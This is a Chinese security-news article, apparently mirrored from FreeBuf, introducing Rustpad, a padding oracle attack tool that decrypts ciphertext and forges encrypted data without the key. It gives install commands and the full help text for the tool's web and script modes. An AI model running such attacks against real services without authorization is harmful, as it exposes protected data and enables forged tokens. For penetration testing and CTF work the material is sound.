5
Rustpad:一款功能强大的多线程Padding Oracle漏洞挖掘工具
source link: https://www.freebuf.com/articles/database/320330.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Rustpad:一款功能强大的多线程Padding Oracle漏洞挖掘工具
Alpha_h4ck
2022-01-19 22:37:30
13481
关于Rustpad
Rustpad是一款功能强大的多线程Padding Oracle漏洞挖掘工具,该工具是PadBuster漏洞挖掘工具的继承者,相当于站在前人的肩膀上实现了自己的功能。该工具基于Rust开发,并且能够利用PaddingOracle漏洞在不知道加密密钥的情况下解密任意密文或加密任意明文数据。
1、解密任意密文
2、加密任意明文
3、块级和字节级的多线程
4、高级实时交互式用户接口
5、No-TTY支持,因此可以通过管道进行数据传输
6、进度条和自动重试
7、智能检测密码文本编码,支持:十六进制、base64、base64url
8、采用纯Rust安全开发,确保了工具的可用性
工具下载&安装
广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/Kibouo/rustpad.git
Arch Linux【aurv1.7.3-1】
yay -Syu rustpad
Kali / Debian【debv1.7.3】
apt install ./rustpad.deb
其他操作系统平台【crates.io v1.7.3】
cargo install rustpad
使用Rustpad来测试Padding Oracle漏洞其实是非常容易的,该工具只需要四个参数信息即可开始漏洞挖掘:
1、目标Oracle(--oracle)
2、需要解密的密文(--decrypt)
3、块大小(--block-size)
4、Oracle类型(Web / 脚本)
工具帮助信息
; rustpad --help rustpad Multi-threaded Padding Oracle attacks against any service. USAGE: rustpad [OPTIONS] --block-size <block_size> --decrypt <decrypt> --oracle <oracle> <SUBCOMMAND> OPTIONS: -B, --block-size <block_size> Block size used by the cypher [possible values: 8, 16] -D, --decrypt <decrypt> Original cypher text, received from the target service, which is to be decrypted --delay <delay> Delay between requests within a thread, in milliseconds [default: 0] -e, --encoding <encoding> Specify encoding used by the oracle to encode the cypher text [default: auto] [possible values: auto, base64, base64url, hex] -E, --encrypt <encrypt> Plain text to encrypt. Encryption mode requires a cypher text to gather necessary data -h, --help Prints help information --no-cache Disable reading and writing to the cache file -n, --no-iv Cypher text does not include an Initialisation Vector --no-url-encode Disable URL encoding and decoding of cypher text -O, --oracle <oracle> The oracle to question with forged cypher texts. This can be a URL or a shell script. See the subcommands `web --help` and `script --help` respectively for further help. -o, --output <output> File path to which log output will be written -t, --threads <threads> Amount of threads in the thread pool -V, --version Prints version information -v, --verbose Increase verbosity of logging SUBCOMMANDS: web Question a web-based oracle script Question a script-based oracle
Web模式
Web模式下,指定的目标Oracle需位于Web上。换句话说,我们的目标Oracle是一个带有URL的Web服务器。
为了保证Padding Oracle成功,如果提供了填充不正确的密文文本,那么Rustpad将会对Oracle的响应信息进行分析,并根据Oracle的行为来对自身进行自动校准。
; rustpad web --help rustpad-web Question a web-based oracle USAGE: rustpad --block-size <block_size> --decrypt <decrypt> --oracle <oracle> web [OPTIONS] OPTIONS: -c, --consider-body Consider the response body and content length when determining the web oracle's response to (in)correct padding -d, --data <data> Data to send in a POST request --delay <delay> Delay between requests within a thread, in milliseconds [default: 0] -e, --encoding <encoding> Specify encoding used by the oracle to encode the cypher text [default: auto] [possible values: auto, base64, base64url, hex] -h, --help Prints help information -H, --header <header>... HTTP header to send -k, --insecure Disable TLS certificate validation -K, --keyword <keyword> Keyword indicating the location of the cypher text in the HTTP request. It is replaced by the cypher text's value at runtime [default: CTEXT] --no-cache Disable reading and writing to the cache file -n, --no-iv Cypher text does not include an Initialisation Vector --no-url-encode Disable URL encoding and decoding of cypher text -o, --output <output> File path to which log output will be written -x, --proxy <proxy> Proxy server to send web requests over. Supports HTTP(S) and SOCKS5 --proxy-credentials <proxy_credentials> Credentials to authenticate against the proxy server with [format: <user>:<pass>] -r, --redirect Follow 302 Redirects -t, --threads <threads> Amount of threads in the thread pool -T, --timeout <timeout> Web request timeout in seconds [default: 10] -A, --user-agent <user_agent> User-agent to identify with [default: rustpad/<version>] -v, --verbose Increase verbosity of logging Indicate the cypher text's location! See `--keyword` for clarification.
脚本模式是为超级用户或CTF玩家准备的,并且能够提供一个可运行的脚本,该模式下的目标Oracle是一个本地Shell脚本。
脚本将允许我们能对本地Oracle或更特殊的服务进行漏洞测试。或者说,我们也可以使用脚本模式来自定义或扩展Rustpad的功能。
; rustpad script --help rustpad-script Question a script-based oracle USAGE: rustpad --block-size <block_size> --decrypt <decrypt> --oracle <oracle> script [OPTIONS] OPTIONS: --delay <delay> Delay between requests within a thread, in milliseconds [default: 0] -e, --encoding <encoding> Specify encoding used by the oracle to encode the cypher text [default: auto] [possible values: auto, base64, base64url, hex] -h, --help Prints help information --no-cache Disable reading and writing to the cache file -n, --no-iv Cypher text does not include an Initialisation Vector --no-url-encode Disable URL encoding and decoding of cypher text -o, --output <output> File path to which log output will be written -t, --threads <threads> Amount of threads in the thread pool -v, --verbose Increase verbosity of logging Script must respond with exit code 0 for correct padding, and any other code otherwise. Cypher text is passed as the 1st argument.
即将添加的功能
1、Tab键自动补全
2、智能化URL解析
3、高级校准
4、块大小自动检测
5、改进Linux二进制文件的大小
6、.NET URL令牌编码
Rustpad:【GitHub传送门】
本文作者:Alpha_h4ck, 转载请注明来自FreeBuf.COM
# 漏洞挖掘 # padding oracle # 漏洞管理
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK